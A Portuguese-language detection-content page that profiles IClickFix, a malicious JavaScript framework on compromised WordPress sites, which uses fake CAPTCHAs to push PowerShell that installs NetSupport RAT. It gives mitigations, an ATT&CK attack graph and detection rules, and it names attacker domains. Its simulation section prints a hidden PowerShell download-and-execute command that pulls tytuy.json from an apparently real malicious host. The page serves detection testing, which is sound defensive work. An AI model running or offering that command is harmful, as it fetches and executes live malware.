Conheça o IClickFix: um framework amplamente difundido que tem como alvo o WordPress utilizando a tática ClickFix
Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório perfila IClickFix, um framework de JavaScript malicioso que compromete sites WordPress e apresenta um CAPTCHA falsificado no estilo do Cloudflare Turnstile. A armadilha coage os visitantes a executar um comando PowerShell que baixa e instala NetSupport RAT. A entrega é suportada por um sistema de distribuição de tráfego construído em torno do YOURLS encurtador de URL e um conjunto rotativo de domínios redirecionadores. Pesquisadores observaram mais de 3.800 sites WordPress comprometidos servindo essa cadeia globalmente desde o final de 2024.
Investigação
Analistas da Sekoia identificaram a tag JavaScript injetada ic-tracker-js em sites comprometidos e então reconstruíram o fluxo de redirecionamento através de múltiplos domínios de curta duração. Eles capturaram o padrão exato de execução do PowerShell usado para recuperar o payload final e recuperaram os componentes caídos do NetSupport RAT juntamente com indicadores de infraestrutura C2 associados.
Mitigação
Monitore o conteúdo da web para a ic-tracker-js injeção e bloqueie domínios maliciosos conhecidos, redirecionadores e serviços de links curtos usados na cadeia. Nos terminais, detecte padrões de download e execução do PowerShell consistentes com a armadilha ClickFix. Adicione cobertura para criação de arquivos do cliente NetSupport e para persistência através de Run chaves de registro no nível do usuário.
Resposta
Quando indicadores surgirem, isole o terminal, interrompa o processo ativo do PowerShell e remova os binários do NetSupport além de qualquer persistência baseada em registro. Siga com uma triagem forense completa para confirmar que o atacante não implantou implantes adicionais ou estabeleceu caminhos de acesso secundários.
graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#cccccc %% Action Nodes action_initial_access[“<b>Ação</b> – <b>T1190 Exploração de Aplicação Exposta ao Público</b><br/>Comprometimento de sites WordPress explorando vulnerabilidades do núcleo ou de plugins populares (Elementor, WooCommerce, Gravity Forms).”] class action_initial_access action action_content_injection[“<b>Ação</b> – <b>T1659 Injeção de Conteúdo</b><br/>Injeção de JavaScript malicioso contendo a tag <i>icu2011trackeru2011js</i> em páginas comprometidas para carregar scripts controlados pelo atacante.”] class action_content_injection action action_software_extensions[“<b>Ação</b> – <b>T1176 Extensões de Software</b><br/>Uso de plugins vulneráveis do WordPress como extensões para manter o código malicioso persistente no site.”] class action_software_extensions action action_dynamic_resolution[“<b>Ação</b> – <b>T1568 Resolução Dinâmica</b><br/>Uso do encurtador YOURLS e de uma cadeia de domínios (por exemplo, ksfldfklskdmbxcvb.com) para resolver e entregar cargas úteis enquanto filtra bots.”] class action_dynamic_resolution action action_obfuscated_payloads[“<b>Ação</b> – <b>T1027 Arquivos Ofuscados ou Armazenados</b><br/>Codificação do JavaScript de primeira etapa e do carregador PowerShell com Base64 e divisão de strings para evasão de detecção.”] class action_obfuscated_payloads action action_user_execution[“<b>Ação</b> – <b>T1204.001 Execução pelo Usuário: Link Malicioso</b><br/>As vítimas clicam na URL comprometida do WordPress, acionando a cadeia de redirecionamento.”] class action_user_execution action action_input_injection[“<b>Ação</b> – <b>T1674 Injeção de Entrada e T1204.004 Copiar-Colar Malicioso</b><br/>JavaScript grava um comando PowerShell na área de transferência e exibe um falso CAPTCHA Cloudflare Turnstile como isca.”] class action_input_injection action action_powershell[“<b>Ação</b> – <b>T1059.001 PowerShell</b><br/>Um comando PowerShell oculto é executado, baixa o script de segunda etapa <i>tytuy.json</i> e instala o NetSupport RAT.”] class action_powershell action action_persistence[“<b>Ação</b> – <b>T1547.014 Execução Automática na Inicialização ou Logon: Active Setup</b><br/>Criação de uma chave de registro Run apontando para <i>client32.exe</i> em ProgramData\\S1kCMNfZi3, garantindo execução na inicialização.”] class action_persistence action action_c2[“<b>Ação</b> – <b>T1102.002 Serviço Web: Comunicação Bidirecional</b><br/>O NetSupport RAT comunica-se via HTTPS com domínios controlados pelo atacante (por exemplo, nightlomsknies.com/fakeurl.htm).”] class action_c2 action action_data_obfuscation[“<b>Ação</b> – <b>T1001 Ofuscação de Dados</b><br/>Ofuscação do tráfego de comando e controle e das cargas úteis para ocultar a atividade maliciosa.”] class action_data_obfuscation action %% Tool / Malware / File Nodes tool_wordpress_core[“<b>Ferramenta</b> – <b>Nome</b>: Núcleo do WordPress<br/><b>Vulnerabilidade</b>: Execução remota de código”] class tool_wordpress_core tool tool_elementor_plugin[“<b>Ferramenta</b> – <b>Nome</b>: Plugin Elementor<br/><b>Vulnerabilidade</b>: Execução remota de código específica de CVE”] class tool_elementor_plugin tool tool_yourls[“<b>Ferramenta</b> – <b>Nome</b>: Encurtador YOURLS<br/><b>Propósito</b>: Redirecionamento de URL e resolução dinâmica”] class tool_yourls tool malware_netsupport[“<b>Malware</b> – <b>Nome</b>: NetSupport RAT<br/><b>Capacidade</b>: Controle remoto e exfiltração de dados”] class malware_netsupport malware file_client32[“<b>Arquivo</b> – <b>Nome</b>: client32.exe<br/><b>Localização</b>: ProgramData\\S1kCMNfZi3”] class file_client32 file file_tyuy_json[“<b>Arquivo</b> – <b>Nome</b>: tytuy.json<br/><b>Propósito</b>: Script PowerShell de segunda etapa”] class file_tyuy_json file %% Connections action_initial_access –>|explora| tool_wordpress_core tool_wordpress_core –>|fornece acesso| action_content_injection action_content_injection –>|injeta script usando| tool_elementor_plugin action_content_injection –>|leva a| action_software_extensions action_software_extensions –>|persiste via| tool_elementor_plugin action_software_extensions –>|habilita| action_dynamic_resolution action_dynamic_resolution –>|utiliza| tool_yourls action_dynamic_resolution –>|entrega| action_obfuscated_payloads action_obfuscated_payloads –>|produz| action_user_execution action_user_execution –>|aciona| action_input_injection action_input_injection –>|escreve comando na área de transferência| action_powershell action_powershell –>|baixa| file_tyuy_json file_tyuy_json –>|instala| malware_netsupport malware_netsupport –>|instala| action_persistence action_persistence –>|cria| file_client32 file_client32 –>|executado na inicialização| action_c2 malware_netsupport –>|comunica-se com| action_c2 action_c2 –>|usa| action_data_obfuscation
Fluxo de Ataque
Detecções
Download ou Upload via Powershell (via cmdline)
Visualizar
Arquivos Suspeitos no Perfil de Usuário Público (via file_event)
Visualizar
A Possibilidade de Execução Através de Linhas de Comando do PowerShell Ocultas (via cmdline)
Visualizar
Uso Suspeito do Invoke-RestMethod (via powershell)
Visualizar
Possível Tentativa de Execução de Binário Gerente NetSupport de Diretório Suspeito (via process_creation)
Visualizar
Possíveis Pontos de Persistência [ASEPs – Software/NTUSER Hive] (via registry_event)
Visualizar
IOCs (HashSha256) para detectar: Conheça o IClickFix: um framework direcionado a WordPress usando a tática ClickFix
Visualizar
IOCs (DestinationIP) para detectar: Conheça o IClickFix: um framework direcionado a WordPress usando a tática ClickFix
Visualizar
IOCs (SourceIP) para detectar: Conheça o IClickFix: um framework direcionado a WordPress usando a tática ClickFix
Visualizar
Detecção de Injeção de JavaScript Malicioso IClickFix [Servidor Web]
Visualizar
Execução de Comando PowerShell para Entrega do NetSupport RAT [PowerShell do Windows]
Visualizar
Execução de Simulação
Pré-requisito: O Telemetria & Baseline Pre‑flight Check deve ter passado.
-
Narrativa e Comandos do Ataque:
Um adversário que tem acesso inicial ao terminal deseja estabelecer uma presença permanente entregando o NetSupport RAT. Para evadir a detecção interativa, eles lançam o PowerShell em modo oculto sem perfil ou logo (
-w hidden -nop -c). Eles então usamInvoke‑WebRequest(iwr) para baixar um payload JSON malicioso (tytuy.json) que contém um script PowerShell para o RAT. O script é escrito no diretório temporário e executado viaInvoke‑Expression. Esta linha de comando exata corresponde às strings que a regra Sigma monitora. -
Script de Teste de Regressão:
# One-liner PowerShell que corresponde à regra de detecção $url = 'https://scottvmorton.com/tytuy.json' $out = "$env:TEMPpayload.ps1" powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)" -
Comandos de Limpeza:
# Remove o payload baixado e qualquer processo PowerShell remanescente Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force